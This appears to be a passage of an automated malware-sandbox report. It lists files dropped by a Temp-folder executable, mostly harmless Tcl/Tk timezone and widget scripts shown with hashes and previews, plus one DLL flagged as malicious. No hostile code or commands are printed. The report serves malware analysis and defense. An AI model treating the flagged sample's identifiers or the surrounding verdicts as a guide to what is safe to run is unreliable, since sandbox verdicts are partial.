                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):196
                                                                                                                                                                                                                                                    Entropy (8bit):4.951561086936219
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Puerto_Rico)]} {. LoadTimeZoneFile America/Puerto_Rico.}.set TZData(:SystemV/AST4) $TZData(:America/Puerto_Rico).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.900537547414888
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Halifax)]} {. LoadTimeZoneFile America/Halifax.}.set TZData(:SystemV/AST4ADT) $TZData(:America/Halifax).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.911352504536709
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:SystemV/CST6) $TZData(:America/Regina).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.929669998131187
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Chicago)]} {. LoadTimeZoneFile America/Chicago.}.set TZData(:SystemV/CST6CDT) $TZData(:America/Chicago).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):199
                                                                                                                                                                                                                                                    Entropy (8bit):4.881715127736134
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indianapolis)]} {. LoadTimeZoneFile America/Indianapolis.}.set TZData(:SystemV/EST5) $TZData(:America/Indianapolis).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):5.071686349792137
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/New_York)]} {. LoadTimeZoneFile America/New_York.}.set TZData(:SystemV/EST5EDT) $TZData(:America/New_York).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):188
                                                                                                                                                                                                                                                    Entropy (8bit):4.927529755640769
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Honolulu)]} {. LoadTimeZoneFile Pacific/Honolulu.}.set TZData(:SystemV/HST10) $TZData(:Pacific/Honolulu).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.953801751537501
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Phoenix)]} {. LoadTimeZoneFile America/Phoenix.}.set TZData(:SystemV/MST7) $TZData(:America/Phoenix).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.909831110037175
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:SystemV/MST7MDT) $TZData(:America/Denver).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.782387645904801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pitcairn)]} {. LoadTimeZoneFile Pacific/Pitcairn.}.set TZData(:SystemV/PST8) $TZData(:Pacific/Pitcairn).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):199
                                                                                                                                                                                                                                                    Entropy (8bit):4.959254419324467
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Los_Angeles)]} {. LoadTimeZoneFile America/Los_Angeles.}.set TZData(:SystemV/PST8PDT) $TZData(:America/Los_Angeles).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.905971098884841
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Gambier)]} {. LoadTimeZoneFile Pacific/Gambier.}.set TZData(:SystemV/YST9) $TZData(:Pacific/Gambier).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.949109665596263
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Anchorage)]} {. LoadTimeZoneFile America/Anchorage.}.set TZData(:SystemV/YST9YDT) $TZData(:America/Anchorage).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.882090609090058
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Turkey) $TZData(:Europe/Istanbul).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.792993822845485
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UCT)]} {. LoadTimeZoneFile Etc/UCT.}.set TZData(:UCT) $TZData(:Etc/UCT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.864166947846424
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Anchorage)]} {. LoadTimeZoneFile America/Anchorage.}.set TZData(:US/Alaska) $TZData(:America/Anchorage).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.839824852896375
                                                                                                                                                                                                                                                    Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:US/Aleutian) $TZData(:America/Adak).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):179
Entropy (8bit):4.886225611026426
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Phoenix)]} {. LoadTimeZoneFile America/Phoenix.}.set TZData(:US/Arizona) $TZData(:America/Phoenix).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):179
Entropy (8bit):4.854450230853601
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Chicago)]} {. LoadTimeZoneFile America/Chicago.}.set TZData(:US/Central) $TZData(:America/Chicago).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):223
Entropy (8bit):4.715837665658945
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:US/East-Indiana) $TZData(:America/Indiana/Indianapolis).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):182
Entropy (8bit):4.990255962392122
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/New_York)]} {. LoadTimeZoneFile America/New_York.}.set TZData(:US/Eastern) $TZData(:America/New_York).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):181
Entropy (8bit):4.832149382727646
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Honolulu)]} {. LoadTimeZoneFile Pacific/Honolulu.}.set TZData(:US/Hawaii) $TZData(:Pacific/Honolulu).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):201
Entropy (8bit):4.825742972037525
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Knox)]} {. LoadTimeZoneFile America/Indiana/Knox.}.set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):180
Entropy (8bit):4.7846496799669405
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Detroit)]} {. LoadTimeZoneFile America/Detroit.}.set TZData(:US/Michigan) $TZData(:America/Detroit).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):177
Entropy (8bit):4.84430947557215
Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:US/Mountain) $TZData(:America/Denver).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):191
                                                                                                                                                                                                                                                    Entropy (8bit):4.885594237758327
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Los_Angeles)]} {. LoadTimeZoneFile America/Los_Angeles.}.set TZData(:US/Pacific) $TZData(:America/Los_Angeles).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):195
                                                                                                                                                                                                                                                    Entropy (8bit):4.931883193402467
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Los_Angeles)]} {. LoadTimeZoneFile America/Los_Angeles.}.set TZData(:US/Pacific-New) $TZData(:America/Los_Angeles).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.789322986138067
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.792993822845485
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:UTC) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):4.829496870339919
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Universal) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):167
                                                                                                                                                                                                                                                    Entropy (8bit):4.9534620854837295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Moscow)]} {. LoadTimeZoneFile Europe/Moscow.}.set TZData(:W-SU) $TZData(:Europe/Moscow).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6694
                                                                                                                                                                                                                                                    Entropy (8bit):3.6896780927557495
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:WET) {. {-9223372036854775808 0 0 WET}. {228877200 3600 1 WEST}. {243997200 0 0 WET}. {260326800 3600 1 WEST}. {276051600 0 0 WET}. {291776400 3600 1 WEST}. {307501200 0 0 WET}. {323830800 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 36
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):149
                                                                                                                                                                                                                                                    Entropy (8bit):4.830292555237936
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLtaFBURFu:SlSWB9IZaM3yzUFVAIgBLYFaRI
                                                                                                                                                                                                                                                    MD5:6C7C2CE174DB462A3E66D9A8B67A28EB
                                                                                                                                                                                                                                                    SHA1:73B74BEBCDAEBDA4F46748BCA149BC4C7FE82722
                                                                                                                                                                                                                                                    SHA-256:4472453E5346AAA1E1D4E22B87FDC5F3170AA013F894546087D0DC96D4B6EC43
                                                                                                                                                                                                                                                    SHA-512:07209059E5E5EB5EE12821C1AC46922DA2715EB7D7196A478F0FA6866594D3C69F4C50006B0EE517CBF6DB07164915F976398EBBD88717A070D750D5D106BA5D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Zulu) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4674
                                                                                                                                                                                                                                                    Entropy (8bit):4.7695981796995355
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Le+U54W3Jp3jgr9a+1FeS9D/CkXg6gvF9D/CYjX16AyyrGuA11/JRJ6xMa89RJ6m:q+W/ga+P39DCd6gt9DC+6AjG9Vn6xMV3
                                                                                                                                                                                                                                                    MD5:DE79F133B24EFA0AD1A8CB0B1F90210F
                                                                                                                                                                                                                                                    SHA1:3C7133228F078C3EB2FBDC05481226FF7D82F40D
                                                                                                                                                                                                                                                    SHA-256:64585C5327B0710D31BFF61C14564FF289ACAAD8743174F95544D8C04306D8C7
                                                                                                                                                                                                                                                    SHA-512:E6F515139B980EDD420E0CD2883146C3C3F472381C8F55E65284CF50AE7D87EFF20B775D539A5FE7F0007DE52DC50F351464F988FE956E916B767D2629D897F9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# word.tcl --.#.# This file defines various procedures for computing word boundaries in.# strings. This file is primarily needed so Tk text and entry widgets behave.# properly for different platforms..#.# Copyright (c) 1996 by Sun Microsystems, Inc..# Copyright (c) 1998 by Scritpics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# The following variables are used to determine which characters are.# interpreted as white space...if {$::tcl_platform(platform) eq "windows"} {. # Windows style - any but a unicode space char. set ::tcl_wordchars {\S}. set ::tcl_nonwordchars {\s}.} else {. # Motif style - any unicode word char (number, letter, or underscore). set ::tcl_wordchars {\w}. set ::tcl_nonwordchars {\W}.}..# Arrange for caches of the real matcher REs to be kept, which enables the REs.# themselves to be cached for greater performance (and somewhat greater.# clarity too
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                                                                    Entropy (8bit):6.301036497326883
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:yorhrGbk0PpCcnCKZrhzuSWTAEn/RgaT2NX8nYRZR2KUk:JcbwKrjWTADaOKYRZQ
                                                                                                                                                                                                                                                    MD5:245C2904F86E27FD357ED7B3962CB435
                                                                                                                                                                                                                                                    SHA1:D38FFB5474C20551740877F9939349F88AA78259
                                                                                                                                                                                                                                                    SHA-256:8065EA4D6BA1CEFCB632B8C942F4ED19A4809816264F7BE5319119FD859B9065
                                                                                                                                                                                                                                                    SHA-512:C646CAB1D9FB7D99AE673130EC0C621FA26DF9D02E264F27828CC27A3A91150E88C7C9BA8D474FD688A94FA9AAB9C8BCBD73F1048A877CFF4DE99D8CECCE7C9C
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8119
                                                                                                                                                                                                                                                    Entropy (8bit):4.822252992121729
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:tKrjzDL5//n7n0rBnT2dpEX9ImoYgMu1Z+4wNsf9IkzxekkEUoVS//iNx:tITL5//jxetHxKGkzxesvAKv
                                                                                                                                                                                                                                                    MD5:9F9316AF7FB23FA66AF05529AF4B95C9
                                                                                                                                                                                                                                                    SHA1:AE429F2175A1CEDF83F4A23E1EDAB6101028F5F1
                                                                                                                                                                                                                                                    SHA-256:7CB80810562587D866D182A5F33174EF43B1E0CBBC2B15BF797B5A76B4FD1917
                                                                                                                                                                                                                                                    SHA-512:2DE40D272B837B9A5A2F33B75E75B6335EB08F4756DDA8767AB3FC2FFE192B6929DE04D989A811216F133536562E3EB3EE20C3B2BDA919B8DC6FFAA53501A566
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# bgerror.tcl --.#.#.Implementation of the bgerror procedure. It posts a dialog box with.#.the error message and gives the user a chance to see a more detailed.#.stack trace, and possible do something more interesting with that.#.trace (like save it to a log). This is adapted from work done by.#.Donal K. Fellows..#.# Copyright (c) 1998-2000 by Ajuba Solutions..# Copyright (c) 2007 by ActiveState Software Inc..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..namespace eval ::tk::dialog::error {. namespace import -force ::tk::msgcat::*. namespace export bgerror. option add *ErrorDialog.function.text [mc "Save To Log"] \..widgetDefault. option add *ErrorDialog.function.command [namespace code SaveToLog]. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault. if {[tk windowingsystem] eq "aqua"} {..option add *ErrorDialog*background systemAlertBackgroundActive \...widgetDefault..option add *ErrorDialog*info.text.background white widgetDefault.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20134
                                                                                                                                                                                                                                                    Entropy (8bit):4.902628577193507
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:EzRtoY3wFnq+j4SpEdPmVmZ6/IVKuzmSaox2ESo+VtocUP5wFnq+j4SpEdPmV8ZK:GoahPSFMmfoz4oFXhPovzmToQBy0zm2I
                                                                                                                                                                                                                                                    MD5:44757F5BDF236E6872FCF82E88D79ACC
                                                                                                                                                                                                                                                    SHA1:01D45BC2E18BBD24FBB484E56C8DEDB270C2DC13
                                                                                                                                                                                                                                                    SHA-256:716F551DA055EE03E0A5145633754917183264F70C657EC478B6D39B0DB20DE8
                                                                                                                                                                                                                                                    SHA-512:4F4C7F878BF90BCFC6E08EBB3565A8D57A34307DCCA61E47B82C6715ACA1F3AA706A746CD893976049D4C3D5C1494EADCAF14B9866EA7C0DA6FCE0B94AAE3C0F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# button.tcl --.#.# This file defines the default bindings for Tk label, button,.# checkbutton, and radiobutton widgets and provides procedures.# that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 2002 ActiveState Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for buttons..#-------------------------------------------------------------------------..if {[tk windowingsystem] eq "aqua"} {. bind Radiobutton <Enter> {..tk::ButtonEnter %W. }. bind Radiobutton <1> {..tk::ButtonDown %W. }. bind Radiobutton <ButtonRelease-1> {..tk::ButtonUp %W. }. bind Checkbutton <Enter> {..tk::ButtonEnter %W. }. bind Checkbutton <1>
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Nim source code, ASCII text
